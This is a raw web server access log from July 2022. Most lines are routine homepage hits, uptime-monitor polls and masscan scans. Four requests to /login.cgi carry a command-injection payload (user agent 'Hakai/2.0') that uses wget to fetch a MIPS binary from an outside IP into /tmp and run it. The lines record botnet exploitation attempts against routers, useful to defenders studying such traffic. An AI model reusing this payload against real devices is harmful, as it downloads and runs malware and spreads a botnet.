2.58.56.101 - - [04/Jul/2022:12:14:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [04/Jul/2022:12:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:15:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.27.158.17 - - [04/Jul/2022:12:17:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.234.114.47 - - [04/Jul/2022:12:18:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.44.102 - - [04/Jul/2022:12:19:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [04/Jul/2022:12:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:20:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:12:21:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
221.181.147.191 - - [04/Jul/2022:12:21:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.6.235.60 - - [04/Jul/2022:12:21:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
157.230.216.203 - - [04/Jul/2022:12:22:01 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [04/Jul/2022:12:22:01 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [04/Jul/2022:12:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
